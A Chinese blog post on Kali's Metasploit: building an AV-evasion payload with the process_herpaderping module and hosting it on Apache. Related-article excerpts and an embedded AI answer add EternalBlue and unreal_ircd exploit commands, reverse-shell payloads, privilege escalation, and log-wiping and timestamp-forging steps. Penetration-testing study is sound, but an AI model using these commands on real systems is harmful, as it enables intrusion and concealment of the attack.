KALI的MSF使用

已于 2023-03-11 10:25:34 修改
阅读量1.2k 收藏 7
点赞数
CC 4.0 BY-SA版权
文章标签: 学习 linux
于 2023-03-11 10:11:34 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Linux_get/article/details/129459663
文章介绍了如何在MSF框架中使用evasion/windows/process_herpaderping模块,通过showoptions配置LHOST参数,并利用ifconfig获取本机IP。若要将操作放到服务器上,需启动apache并复制文件至服务器。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

首先打开msf后,输入show evasion

 使用use evasion/windows/process_herpaderping

 打开如下图

打开后,输入show options进行参数的配置

可以看到 中间的LHOST本机IP地址的参数需要填写

可以新打开一个终端输入ifconfig进行本机IP地址的查看

 完成!!!

如果想要放到服务器上,,就需要打开apache

 将桌面的文件copy到apache即可

Linux_get
关注
渗透工具之Kali MSF(metasploit framework)使用
赤赤三的博客
03-20 5048
初识MSF(渗透测试开源软件平台,一个漏洞利用框架,对计算机软件漏洞进行攻击) Kali查找MSF框架:cd /usr/share/metasploit-framework,进入windows攻击模块:cd /usr/share/metasploit-framework/modules/exploits/windows 学习路线:MSF了解------>安装MSF2-Linux靶机------->MSF基本使用方法------>MSF实战:攻击win7主机并远程执行命令|扫描靶机my
KaliLinux-MSF-常用命令
Candour_0的博客
03-15 567
msfconsole。
Kali msf教程
08-24
kali linux msf系列教程
kali笔记】Metasploit Framework (MSF) 从基础到进阶使用指南,零基础入门到精通,收藏这一篇就够了
Javachichi的博客
09-27 1938
Metasploit Framework最初由HD Moore于2003年发布,并于2007年使用Ruby语言重写。MSF默认集成在Kali Linux中,同时也支持在非Kali环境下安装和使用。它提供了一套完整的渗透测试框架,包括漏洞利用模块(exploits)、攻击载荷(payloads)、辅助模块(auxiliary)、编码器(encoders)、空指令(nops)、后渗透模块(post)等多个组件。MSF的强大之处在于其可扩展性。
msf基础使用方法
最新发布
m0_74849202的博客
04-30 626
msfvenom的功能:常用于生成木马,在目标机器上执行,在本地机器kali中上线,与反弹Shell类似。MSFV enom可以生成两种类型的攻击载荷:(1)Payload:Payload中包含攻击进入目标主机后需要在远程系统中运行的恶意程序,而在Metasploit中Payload是一种特殊模块,它们能够以漏洞利用模块运行,并能够利用目标系统中的安全漏洞实施攻击。简而言之,这种漏洞利用模块可以访问目标系统,而其中的代码定义了Payload在目标系统中的行为。
网络安全: Kali Linux 使用 MSF 渗透测试
cronaldo91的博客
03-05 3441
(6) 查看Kali Linux (2022.4)系统IP地址。(5)查看Kali Linux (2022.4)系统版本。(2)查看Kali Linux (2024.1)系统版本。(1)Kali Linux (2024.1)系统版本。(2)Kali Linux (2022.4)系统版本。(1)Kali Linux (2024.1)系统版本。(2)Kali Linux (2022.4)系统版本。(1)Kali Linux (2024.1)系统版本。(2)Kali Linux (2022.4)系统版本。
渗透工具——kalimsf简介(以及MSF的基本使用方法)
2301_78006725的博客
09-02 9357
设置payload:set payload windows/x64/meterpreter/reverse_tcp。1. 使用攻击模块:use exploit/windows/smb/ms17_010_eternalblue。设置模块:use auxiliary/scanner/smb/smb_ms17_010。攻击者或者渗透测试者利用系统、应用或服务中的安全漏洞,所进行的攻击行为。在MSF中,一个模块是指MSF框架中所使用的一段软件代码组件。设置目标地址:set RHOSTS [目标地址]
kali使用msf–永恒之蓝攻击模块windows2008 R2
lkwdoitnow的博客
03-31 1539
准备: kali虚拟机、window2008 R2 虚拟机 请保证kali可以ping通win2008(如果win2008可以pingkalikali不可以pingwin2008 请检查win2008的防火墙是否关闭) 在kali中输入msfconsole进入msf 选择攻击武器auxiliary/scanner/smb/smb_version 输入show options来查看需要设置的信息 选择攻击对象: set rhosts id(目标主机win2008) 选择网关
超详细!!简单使用kaliMSF渗透Windows主机操作实战,真实有效
2401_83640658的博客
02-12 734
超详细!!简单使用kaliMSF渗透Windows主机操作实战,真实有效
网络安全:kaliMSF工具基本使用方法
Mr_qing的博客
10-08 5495
1、进入MSF工具:nsfconsole 2、查询漏洞利用工具:search 漏洞编号 3、打开工具:use 工具id 4、查看工具配置参数:show options 5、查看工具的详细信息:info 6、配置参数: set 参数头 目标主机 set 参数头 目标端口 (参数配置根据实际所缺参数为准) 7、运行工具:run或者exploit @返回命令:back @新版kali已经自动配置Payload;不需要再次自己配置(当然也可以自己配置:set payload windows/***/…
Kali MSF(metasploit)永恒之蓝漏洞利用
dbsod007520的博客
05-03 977
Windows7永恒之蓝漏洞利用 1、靶机为win7系统且未即使更新补丁,并且开启了445端口,关闭了防火墙 2、输入msfconsole命令,启动msf 3、搜索漏洞代码,获取攻击模块 search 17-010 //搜索永恒之蓝漏洞代码MS17-010 4、使用第一个辅助模块,设置目标主机IP,执行后显示存在可利用的MS17-010漏洞 setg rhosts 192.168.1.17 //setg为设置全局变量,rhosts是目标主机,此命令表示后续操作中目标主机ip始终为192.168.1
kali linux-msf-ssh爆破
10-13
使用 nmap(-A -T4参数) metasploit (直接search 查找,然后 use利用就好了)本模块将测试SSH登录,在一系列的机器和报告成功登录。如果你有一个数据库加载插件和连接到一个数据库,该模块会记录成功登录和HOSTS使您可以跟踪您的访问。
Kali MSF命令模块最详细模块与利用解释整合
Sunspot
04-19 2198
稍后,如果另一个请求到达该 ISAPI 模块,则将使用先前获得的指针,从而导致访问冲突或潜在的任意代码执行。该模块发送格式错误的 TKEY 查询,该查询利用在受影响的 BIND9“命名”DNS 服务器上处理 TKEY 查询时的错误。由于BigIP会在第一个未经身份验证的请求后分配一个新会话,并且仅当访问策略超时时才删除该会话,因此攻击者可以通过重复发送初始HTTP请求并使会话处于挂起状态来耗尽所有可用的会话。POST 请求处理中的边界错误而存在的,其中应用程序输入设置为过长的文件名。
Metasploit(MSF)使用详解—以kali系统环境下永恒之蓝(ms17_010)为例
weoptions的博客
09-21 5840
Metasploit是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的Metasploit是采用Perl语言编写的,但是再后来的新版中,改成了用Ruby语言编写的了。在kali中,自带了Metasploit工具。我们接下来以大名鼎鼎的永恒之蓝MS17_010漏洞为切入点,讲解MSF框架的使用
kali2.0第一次启动msf
Reset
04-16 9665
msf即Metasploit Framework,可以用来漏洞利用。漏洞探测等功能,是一个非常好的工具。 第一次使用msf: ①、先启动postgresql数据库,这个是msf 的默认数据库。 service postgresql start 或者 /etc/init.d/postgresql start ②、第一次用所以需要初始化数据库 postgresql enable ③、...
网络安全: Kali Linux 使用 MSF 漏洞利用
cronaldo91的博客
03-06 2568
(4)Kali Lnux (2024.1) 使用MSF运⾏脚本。(4) 查看Windows server 2008 IP 地址。(2)上传后⻔程序nc.exe 到Windows server。(3)查看Kali Linux (2024.1)系统IP地址。点击CVEs查看通用漏洞编号(cve-2015-1635)(2)查看Kali Linux (2024.1)系统版本。(1)获取windows 服务器的密⽂密码。(10)UAC (用户账户控制设置)管理。192.168.204.146(动态)
kali linuxMsf
weixin_30432007的博客
03-06 466
目前最流行,最强大,最具扩展性的渗透测试平台软件 基于metasploit进行渗透测试和漏洞分析的流程和方法 框架集成了渗透测试标准(PETS)思想 一定程度上统一了渗透测试和漏洞研究的工作环境 新的攻击代码可以比较容易加入框架 开发活跃版本更新平率(每周) 使用postgresql数据库存储数据 MSF架构 Rex 基本功能库,用于完成日常基本任务,无需人工手动编...
Kali--MSF-永恒之蓝详解(复现、演示、远程、后门、加壳、修复)
xnxqwzy的博客
08-22 3933
永恒之蓝(EternalBlue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日,不法分子通过改造“永恒之蓝”制作了wannacry程序,使全世界大范围内遭受了该程序,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。但不过在该程序出来不久就被微软通过打补丁修复了。为了维持操作系统的安全,我们能做到的是及时更新,安装补丁,关闭不必要的服务和端口。
kali msf
03-08
<think>好的,用户想了解Kali Linux中Metasploit框架的使用和指南。首先,我需要根据提供的引用信息来组织回答。引用[1]提到Kali Linux预装了Metasploit,并且可以通过apt更新。引用[2]是关于Metasploit的基础使用,包括安装和使用框架进行漏洞利用。引用[3]展示了使用特定漏洞模块的例子,比如unreal_ircd_3281_backdoor。引用[4]提到了一些Metasploit的命令,比如getsystem提权、clearev清除日志等。 用户需要的是使用指南,所以应该分步骤说明,从更新Metasploit开始,到启动msfconsole,然后搜索漏洞模块、配置参数、执行攻击,以及后渗透阶段的操作。每个步骤需要结合引用中的具体命令,比如apt update和upgrade来自引用[1],use exploit/unix/irc/unreal_ircd_3281_backdoor来自引用[3],getsystem和clearev来自引用[4]。还要注意确保LaTeX格式的正确,比如变量用$...$包裹,独立公式用$$...$$。同时,生成相关问题时要覆盖安装、漏洞利用、提权方法、日志清理等主题,并正确添加引用标识。 需要验证每个步骤的命令是否正确,例如更新Metasploit的步骤是否正确,启动msfconsole后的命令顺序是否合理。同时,确保引用的内容正确对应到相应的引用编号,例如使用漏洞模块的部分对应引用[3],提权和日志清理对应引用[4]。此外,回答结构要清晰,分步骤说明,帮助用户逐步操作,并且引用在段落末尾自然标注。最后生成的相关问题要覆盖用户可能感兴趣的扩展内容,比如安装、漏洞查找、提权、日志清理等。</think>### Kali Linux中Metasploit框架使用指南 #### 1. 更新Metasploit Kali Linux预装了Metasploit框架,但需先更新到最新版本。在终端中执行: ```bash sudo apt update && sudo apt upgrade -y ``` 此操作同步官方仓库的漏洞数据库和工具补丁[^1]。 #### 2. 启动Metasploit控制台 ```bash msfconsole ``` 启动后进入交互式界面,可输入`help`查看支持的命令。 #### 3. 漏洞利用示例(以IRC服务漏洞为例) ```bash msf6 > use exploit/unix/irc/unreal_ircd_3281_backdoor # 选择漏洞模块[^3] msf6 exploit(unreal_ircd_3281_backdoor) > set RHOSTS 192.168.1.100 # 设置目标IP msf6 exploit(unreal_ircd_3281_backdoor) > exploit # 执行攻击 ``` 成功利用后会建立反向Shell连接。 #### 4. 后渗透操作 - **提权**:在Meterpreter会话中使用`getsystem`尝试提权[^4] - **日志清理**:`clearev`命令清除系统日志(需System权限) - **文件操作**:`timestomp`可复制文件时间戳,如: ```bash timestomp C://2.txt -f C://1.txt ``` #### 5. 模块搜索与配置 ```bash msf6 > search type:exploit platform:windows # 按类型/平台筛选 msf6 > info auxiliary/scanner/ssh/ssh_login # 查看模块详细信息 ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值